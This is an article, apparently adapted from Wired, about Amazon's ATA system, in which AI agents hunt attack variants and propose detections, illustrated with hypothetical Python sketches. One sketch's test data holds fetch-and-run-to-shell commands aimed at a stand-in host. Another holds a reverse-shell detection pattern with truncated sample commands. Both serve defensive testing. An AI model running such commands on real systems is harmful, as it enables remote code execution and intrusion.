Amazon Is Using Specialized AI Agents for Deep Bug Hunting

Amazon's Autonomous Threat Analysis: The Future of Deep Bug Hunting

As generative AI accelerates software development, the threat landscape is evolving just as quickly. Cyber attackers are growing more sophisticated, using AI-powered tools to carry out financially motivated or state-backed hacks. Security teams at tech companies therefore face an unprecedented challenge: reviewing an ever-growing volume of code while fending off increasingly capable adversaries.

To address this challenge, Amazon has been using an internal system called Autonomous Threat Analysis (ATA) to proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and develop remediations and detection capabilities to plug holes before attackers find them.
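Amazon has not described how ATA performs variant analysis. As a crude, hypothetical stand-in, the sketch below ranks code snippets by textual similarity to one known-bad pattern using the standard library's `difflib.SequenceMatcher`. The function name `find_variants`, the sample snippets, and the 0.6 threshold are all assumptions; a production tool would more likely match on code structure than on raw text.

```python
# Hypothetical sketch of variant analysis: given one known-bad code pattern,
# rank other snippets by textual similarity so humans can review likely variants.
# The snippet corpus and the 0.6 threshold are illustrative assumptions.
from difflib import SequenceMatcher


def find_variants(known_flaw, candidates, threshold=0.6):
    """Return (snippet, score) pairs whose similarity to known_flaw >= threshold."""
    scored = []
    for snippet in candidates:
        score = SequenceMatcher(None, known_flaw, snippet).ratio()
        if score >= threshold:
            scored.append((snippet, round(score, 2)))
    # Most similar first, so reviewers see the closest variants at the top
    return sorted(scored, key=lambda pair: pair[1], reverse=True)


known_flaw = "subprocess.run(user_input, shell=True)"
corpus = [
    "subprocess.run(user_cmd, shell=True)",
    "subprocess.call(request_arg, shell=True)",
    'print("hello world")',
]

for snippet, score in find_variants(known_flaw, corpus):
    print(score, snippet)
```

Text similarity is cheap and language-agnostic, but it misses variants that are written differently yet behave the same, which is why structural matching is the usual next step.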

The Birth of ATA

ATA grew out of an internal Amazon hackathon in August 2024, where security team members proposed pitting specialized AI agents against each other in two teams. The agents would rapidly investigate real attack techniques and the different ways they could be used against Amazon's systems, then propose security controls for human review.
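The two-team setup can be pictured as a loop in which offensive agents propose techniques and defensive agents answer each one with a control, with every pairing queued for people to review. This is a hypothetical sketch: `red_team`, `blue_team`, `run_round`, and `Proposal` are invented names, and both agents are stubbed with trivial functions rather than AI models.

```python
# Hypothetical sketch of one red-versus-blue round. Both "agents" are stubs;
# in a real system each would be an AI agent working in a test environment.
from dataclasses import dataclass


@dataclass
class Proposal:
    technique: str
    control: str
    status: str = "pending_human_review"  # nothing is applied automatically


def red_team(seed_techniques):
    # Stub offensive agent: derive a candidate variant from each known technique.
    return [f"{t} (variant)" for t in seed_techniques]


def blue_team(technique):
    # Stub defensive agent: draft a matching control for the technique.
    return f"detection rule for {technique}"


def run_round(seed_techniques):
    # Pair each red-team technique with a blue-team control for human review.
    return [Proposal(t, blue_team(t)) for t in red_team(seed_techniques)]


proposals = run_round(["credential dumping", "python reverse shell"])
for p in proposals:
    print(p.status, "|", p.technique, "->", p.control)
```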

"The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape," says Steve Schmidt, Amazon's chief security officer. "Limited coverage means you can't get through all of the software or you can't get to all of the applications because you just don't have enough humans. And then it's great to do an analysis of a set of software, but if you don't keep the detection systems themselves up to date with the changes in the threat landscape, you're missing half of the picture."

Scaling ATA

To scale its use of ATA, Amazon developed special "high-fidelity" testing environments that are deeply realistic reflections of Amazon's production systems, so ATA can both ingest and produce real telemetry for analysis.

The company's security teams also designed ATA so that every technique it employs, and every detection capability it produces, is validated with real, automated testing and system data. Red team agents, which look for attacks that could be used against Amazon's systems, execute actual commands in ATA's special test environments that produce verifiable logs. Blue team, or defense-focused, agents use real telemetry to confirm whether the protections they propose are effective. And whenever an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.
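The blue team's check can be sketched as scoring a proposed detection against time-stamped logs from red-team runs and from benign activity. Amazon has not published ATA's log formats, so the record layout, the sample commands, and the `pipe_to_shell` detection below are hypothetical.

```python
# Minimal sketch: score a proposed detection against logs from red-team runs.
# The log format, commands, and detection predicate are illustrative assumptions.
from datetime import datetime, timezone


def make_log(command):
    # Each executed command yields a time-stamped record that can be audited later.
    return {"ts": datetime.now(timezone.utc).isoformat(), "command": command}


def evaluate_detection(detect, attack_logs, benign_logs):
    """Return (detection rate on attack logs, false-positive rate on benign logs)."""
    if not attack_logs or not benign_logs:
        raise ValueError("need both attack and benign logs to evaluate")
    hits = sum(1 for log in attack_logs if detect(log))
    false_positives = sum(1 for log in benign_logs if detect(log))
    return hits / len(attack_logs), false_positives / len(benign_logs)


# Hypothetical red-team commands (download piped to a shell) and benign activity
attack_logs = [
    make_log("curl -s http://example.invalid/a.sh | sh"),
    make_log("wget -qO- http://example.invalid/b.sh | sh"),
]
benign_logs = [
    make_log("ls -la /tmp"),
    make_log("curl -o page.html https://example.com"),
]


def pipe_to_shell(log):
    # Proposed detection: flag any command that pipes output into a shell.
    return "| sh" in log["command"]


detection_rate, fp_rate = evaluate_detection(pipe_to_shell, attack_logs, benign_logs)
print(f"detection rate: {detection_rate:.0%}, false positives: {fp_rate:.0%}")
```

Measuring both rates matters: a rule that fires on everything would score a perfect detection rate while flooding analysts with false positives.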

Verifiability and Hallucination Management

This verifiability reduces false positives, Schmidt says, and acts as "hallucination management." Because the system is built to demand specific standards of observable evidence, he claims, "hallucinations are architecturally impossible."
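One way to picture this kind of "hallucination management" is as an evidence gate: an agent's claim is accepted only if every log it cites actually exists and falls within the test run. This is a hypothetical illustration of the idea, not ATA's mechanism; `Finding`, `is_supported`, the log-store layout, and the dates are invented.

```python
# Hypothetical evidence gate: a finding is accepted only if every log entry it
# cites exists in the test environment's log store and falls inside the run window.
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Finding:
    claim: str
    cited_log_ids: list


def is_supported(finding, log_store, run_start, run_end):
    if not finding.cited_log_ids:
        return False  # no evidence, no acceptance
    for log_id in finding.cited_log_ids:
        entry = log_store.get(log_id)
        if entry is None:
            return False  # cited log does not exist
        if not (run_start <= entry["ts"] <= run_end):
            return False  # log falls outside this test run
    return True


start = datetime(2025, 1, 1, 12, 0)
end = datetime(2025, 1, 1, 13, 0)
log_store = {"log-1": {"ts": datetime(2025, 1, 1, 12, 30), "event": "process_start"}}

real = Finding("technique executed", ["log-1"])
invented = Finding("technique executed", ["log-99"])
print(is_supported(real, log_store, start, end))      # True
print(is_supported(invented, log_store, start, end))  # False
```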

The Power of Teamwork

ATA's specialized agents work together in teams, each lending its expertise toward a larger goal, much as humans collaborate on security testing and defense development. The difference AI makes, says Amazon security engineer Michael Moran, is the ability to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that would be prohibitively time-consuming for humans alone.
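Generating "variations and combinations" can, in its simplest form, mean taking the Cartesian product of technique building blocks so that each combination can be queued for testing. The sketch uses `itertools.product`; the component lists are hypothetical placeholders, not techniques Amazon has named.

```python
# Illustrative only: enumerate combinations of technique building blocks so
# each combination can be queued for testing. Component names are hypothetical.
from itertools import product

delivery = ["http_download", "dns_tunnel"]
execution = ["python_interpreter", "shell_pipe", "scheduled_task"]
obfuscation = ["none", "base64_encoded"]

variants = [
    {"delivery": d, "execution": e, "obfuscation": o}
    for d, e, o in product(delivery, execution, obfuscation)
]

print(len(variants))  # 12
print(variants[0])
```

The count grows multiplicatively with each new dimension, which is exactly why testing every combination by hand quickly becomes impractical.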

"I get to come in with all the novel techniques and say, 'I wonder if this would work?' And now I have an entire scaffolding and a lot of the base stuff is taken care of for me" in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. "It makes my job way more fun but it also enables everything to run at machine speed."

Real-World Results

Schmidt also notes that ATA has already been highly effective at examining specific attack capabilities and generating defenses. In one example, the system focused on Python "reverse shell" techniques, which attackers use to make a target device initiate a connection back to the attacker's computer, giving the attacker remote command-line access. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon's defense systems that proved to be 100 percent effective.
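For a sense of what a detection in this space might look like, here is a deliberately simple, hypothetical heuristic. It flags Python command lines that combine an inline script (`-c`) with the `socket` module and a process or I/O-redirection module (`subprocess`, `pty`, or `os.dup2`), a combination common in publicly documented reverse-shell one-liners. It is not Amazon's detection, the sample command lines are truncated and non-functional, and text matching like this is easy to evade; a sturdier rule would likely also draw on process and network telemetry.

```python
# Hypothetical heuristic, not Amazon's detection: flag Python command lines that
# combine an inline script with networking and process/IO-redirection modules.
import re

# "python", "python3", "python3.11", ... followed by the -c flag
INLINE_PYTHON = re.compile(r"\bpython[0-9.]*\s+-c\b")
NETWORK = re.compile(r"\bsocket\b")
REDIRECT = re.compile(r"\b(?:subprocess|pty|dup2)\b")


def looks_like_python_reverse_shell(cmdline):
    """Return True only if all three indicators appear in one command line."""
    return all(
        pattern.search(cmdline)
        for pattern in (INLINE_PYTHON, NETWORK, REDIRECT)
    )


# Truncated, non-functional sample command lines (hypothetical test data)
suspicious = [
    "python3 -c 'import socket,subprocess,os; s=socket.socket(...); ...'",
    "python -c 'import socket,os,pty; ...; os.dup2(...); pty.spawn(...)'",
]
benign = [
    "python3 -c 'print(1 + 1)'",
    "python3 manage.py runserver",
    "python3 -c 'import socket; print(socket.gethostname())'",
]

caught = sum(looks_like_python_reverse_shell(c) for c in suspicious)
false_alarms = sum(looks_like_python_reverse_shell(c) for c in benign)
print(f"caught {caught}/{len(suspicious)}, false alarms {false_alarms}/{len(benign)}")
```

Requiring all three indicators together is what keeps the third benign sample, which uses `socket` legitimately, from triggering an alert.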

The Future of ATA

ATA works autonomously, but it follows a "human in the loop" approach: a real person must sign off before any change is made to Amazon's security systems. Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that by handling the massive volume of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.
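The "human in the loop" requirement can be sketched as a queue that agents can add to but not deploy from: a change moves forward only after a named person approves it. `ProposedChange`, `ChangeQueue`, and the reviewer name are hypothetical.

```python
# Minimal sketch of a human-in-the-loop gate: agents may propose changes, but a
# change is deployed only after a named human approves it. Names are hypothetical.
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProposedChange:
    description: str
    approved_by: Optional[str] = None


class ChangeQueue:
    def __init__(self):
        self.pending = []
        self.deployed = []

    def propose(self, change):
        # Agents can only enqueue; they have no path to deploy directly.
        self.pending.append(change)

    def approve(self, change, reviewer):
        # Approval records which person signed off.
        change.approved_by = reviewer

    def deploy_approved(self):
        # Move only human-approved changes out of the pending queue.
        ready = [c for c in self.pending if c.approved_by]
        self.pending = [c for c in self.pending if not c.approved_by]
        self.deployed.extend(ready)
        return ready


queue = ChangeQueue()
a = ProposedChange("add detection for inline Python socket use")
b = ProposedChange("tighten egress rule on build hosts")
queue.propose(a)
queue.propose(b)
queue.approve(a, reviewer="security-engineer-1")
print([c.description for c in queue.deploy_approved()])
print([c.description for c in queue.pending])
```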

The next step, he says, is to start using ATA in real-time incident response, to identify and remediate actual attacks on Amazon's massive systems more quickly.

"AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats," Schmidt says. "I think the part that's most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most."

Code Example: ATA's Specialized Agents

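```python
# Simplified, hypothetical illustration of ATA's two agent roles.
# This is not Amazon's code; commands are only recorded, never executed.
from datetime import datetime, timezone


class RedTeamAgent:
    """Offense-focused agent that records a log entry for each command."""

    def __init__(self, agent_id):
        self.agent_id = agent_id
        self.log_data = []

    def execute_command(self, command):
        # Placeholder for running the command in an isolated test
        # environment; here we only append a time-stamped log entry.
        entry = {
            "agent_id": self.agent_id,
            "command": command,
            "timestamp": datetime.now(timezone.utc).isoformat(),
        }
        self.log_data.append(entry)
        return entry


class BlueTeamAgent:
    """Defense-focused agent that checks a proposed detection against telemetry."""

    def __init__(self, agent_id):
        self.agent_id = agent_id
        self.telemetry_data = []

    def analyze_telemetry(self, telemetry, detection_keyword):
        # Store the telemetry, then report whether the proposed detection
        # (a simple keyword match, for illustration) fires on it.
        self.telemetry_data.append(telemetry)
        return detection_keyword in telemetry["command"]


# Create instances of the agents
red_team_agent = RedTeamAgent(1)
blue_team_agent = BlueTeamAgent(2)

# The red team's log entry becomes the blue team's telemetry
log_entry = red_team_agent.execute_command("command1")
detected = blue_team_agent.analyze_telemetry(log_entry, "command1")

# Print the results
print("Red Team Agent Log Data:", red_team_agent.log_data)
print("Blue Team Agent Telemetry Data:", blue_team_agent.telemetry_data)
print("Detection fired:", detected)
```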

This code example is a simplified, hypothetical illustration, not Amazon's code. The red team agent stands in for agents that execute actual commands in ATA's test environments and produce verifiable logs, while the blue team agent stands in for defense-focused agents that use real telemetry to confirm whether the protections they propose are effective.

Source: https://www.wired.com/story/amazon-autonomous-threat-analysis/